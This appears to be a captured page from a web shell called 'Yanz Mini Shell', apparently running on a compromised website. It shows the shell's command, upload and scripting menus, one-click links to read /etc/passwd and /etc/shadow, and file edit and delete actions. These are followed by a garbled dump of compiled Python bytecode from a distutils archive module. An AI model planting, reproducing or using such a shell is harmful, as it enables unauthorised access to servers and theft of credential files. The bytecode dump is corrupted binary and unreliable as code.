Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
input-mask
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
U &��_|! � @ sD d Z ddlZddlmZ ddlZzddlZW n ek rD dZY nX ddlmZ ddl m Z ddlmZ ddl mZ zddlmZ W n ek r� dZY nX zdd lmZ W n ek r� dZY nX d d� Zdd � Zd#dd�Zd$dd�Zedgdfedgdfedgdfedgdfedgdfeg dfd�Zdd � Zd%d!d"�ZdS )&zodistutils.archive_util Utility functions for creating archive files (tarballs, zip files, that sort of thing).� N)�warn)�DistutilsExecError)�spawn)�mkpath)�log)�getpwnam)�getgrnamc C sN t dks| dkrdS zt | �}W n tk r8 d}Y nX |dk rJ|d S dS )z"Returns a gid, given a group name.N� )r �KeyError��name�result� r �5/opt/python38/lib/python3.8/distutils/archive_util.py�_get_gid s r c C sN t dks| dkrdS zt | �}W n tk r8 d}Y nX |dk rJ|d S dS )z"Returns an uid, given a user name.Nr )r r r r r r �_get_uid+ s r �gzipc s. dddddd�}dddd d �}|dk r:||� � kr:td��| d } |dkrZ| |�|d�7 } ttj�| �|d� ddl} t� d� t ���t��� � ���fdd�}|s�| �| d|| �}z|j||d� W 5 |� � X |dk�r*tdt� | || } tjdk�r|| | g}n |d| g}t||d� | S | S )a= Create a (possibly compressed) tar file from all the files under 'base_dir'. 'compress' must be "gzip" (the default), "bzip2", "xz", "compress", or None. ("compress" will be deprecated in Python 3.2) 'owner' and 'group' can be used to define an owner and a group for the archive that is being built. If not provided, the current owner and group will be used. The output tar file will be named 'base_dir' + ".tar", possibly plus the appropriate compression extension (".gz", ".bz2", ".xz" or ".Z"). Returns the output filename. �gz�bz2�xz� )r �bzip2r N�compressz.gzz.bz2z.xzz.Z)r r r r NzKbad value for 'compress': must be None, 'gzip', 'bzip2', 'xz' or 'compress'z.tarr ��dry_runr zCreating tar archivec s, � d k r� | _ �| _�d k r(�| _�| _| S )N)�gid�gname�uid�uname)�tarinfo�r �group�ownerr r r �_set_uid_gida s z"make_tarball.<locals>._set_uid_gidzw|%s)�filterz'compress' will be deprecated.�win32z-f)�keys� ValueError�getr �os�path�dirname�tarfiler �infor r �open�close�addr �PendingDeprecationWarning�sys�platformr )� base_name�base_dirr �verboser r"